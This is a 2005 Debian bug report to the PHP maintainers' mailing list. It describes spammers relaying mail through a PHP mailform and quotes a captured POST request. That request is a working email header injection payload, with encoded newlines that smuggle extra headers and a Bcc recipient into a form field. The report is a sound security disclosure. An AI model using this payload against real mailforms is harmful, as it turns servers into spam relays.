[php-maint] Bug#325550: php4: Problems with mail() function allow relaying through mailforms...

Luc Stroobant debian at stroobant.be
Mon Aug 29 11:58:21 UTC 2005


Package: php4
Version: 4:4.3.10-15
Severity: normal

Last weekend, we noticed some attempts to abuse on of our mailforms.
Analysis of our mail logs showed some mails where sent through a php script.
As the "To" field was hard coded in the script and register_globals was off,
the spammer must have used some other method to send the mail.

A stripped down version of the original script can be found on:
http://www.stroobant.be/phpmail/mailscript.phps

I used mod_security to intercept the POST requests...
Here is one of those requests:

r=oirkcyexud%40coza.net%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D%22%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D1269369969%3D%3D%22%0AMIME-Ver
sion%3A+1.0%0ASubject%3A+e2dae455%0ATo%3A+oirkcyexud%40coza.net%0Abcc%3A+jrubin3546%40aol.com%0AFrom%3A+oirkcyexud%40coza.net%0A%0AThis+is+a+multi-part+messag
e+in+MIME+format.%0A%0A--%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D1269369969%3D%3D%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Versi
on%3A+1.0%0AContent-Transfer-Encoding%3A+7bit%0A%0Adzrgpjy%0A--%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D1269369969%3D%3D--%0A
&name=oirkcyexud%40coza.net
&subject=oirkcyexud%40coza.net
&email=oirkcyexud%40coza.net&submit=oirkcyexud%40coza.net

It shows he was able to insert an addition recipient through the "r" variable, which is the reaction field. (and not the from or to, as one would expect)
He used some multi-part boundaries for this. IMHO this is a bug in the PHP mail() function and I'm afraid this kind of abuse can be used on quite a lot PHP mailforms...
I can provide you with addition details and server logs if needed.

Regards,

Luc


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-686
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages php4 depends on:
ii  libapache-mod-php4           4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-common                  4:4.3.10-15 Common files for packages built fr

-- no debconf information




More information about the pkg-php-maint mailing list